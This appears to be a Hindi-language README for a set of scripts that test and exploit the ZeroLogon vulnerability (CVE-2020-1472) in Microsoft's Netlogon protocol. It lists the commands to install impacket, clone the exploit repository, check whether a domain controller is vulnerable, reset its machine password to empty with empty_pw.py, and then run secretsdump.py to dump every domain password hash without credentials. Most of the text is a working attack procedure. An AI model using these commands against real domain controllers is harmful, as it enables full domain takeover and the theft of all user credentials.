
zerologon भेद्यता (CVE-2020-1472) का परीक्षण और शोषण करने के लिए स्क्रिप्ट का सेट।
स्क्रिप्ट्स का सेट, zerologon कमजोरी (CVE-2020-1472) का परीक्षण और शोषण करने के लिए
ZeroLogon एक कमजोरी है जो हमें माइक्रोसॉफ्ट के एक्टिव डायरेक्टरी Netlogon रिमोट प्रोटोकॉल (MS-NRPC) में क्रिप्टोग्राफी दोष का शोषण करने की अनुमति देती है, जो उपयोगकर्ताओं को NTLM का उपयोग करके सर्वरों में लॉग इन करने की अनुमति देता है।
एक्सप्लॉइट को निष्पादित करने से पहले हमें पता होना चाहिए कि हमें impacket का एक अलग संस्करण चाहिए, इसके लिए हम निम्नलिखित करेंगे।
apt remove --purge impacket-scripts python3-impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
git clone https://github.com/Nekoox/zerologon.git
cd zerologon
pip install -r requirements.txt
python3 tester.py <DC-NAME> <ip-address>
यदि पीड़ित DC संवेदनशील है, तो एक संदेश आएगा जिसमें कहेगा "सफलता! Zerologon हमले द्वारा DC को पूरी तरह से समझौता किया जा सकता है।"
अन्यथा, अर्थात्, पीड़ित DC संवेदनशील नहीं है क्योंकि सुरक्षा छेद को पैच किया गया है, हमें निम्नलिखित संदेश मिलेगा "हमला विफल हुआ। लक्ष्य संभवतः पैच किया गया है।"
python3 empty_pw.py <DC-NAME> <ip-address>
यदि डोमेन नियंत्रक संवेदनशील है, तो एक्सप्लॉइट चलाने के बाद उसके पास कोई पासवर्ड नहीं होना चाहिए।
> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>
इसे निष्पादित करके, हम बिना किसी क्रेडेंशियल के डोमेन के सभी हैश देख पाएंगे।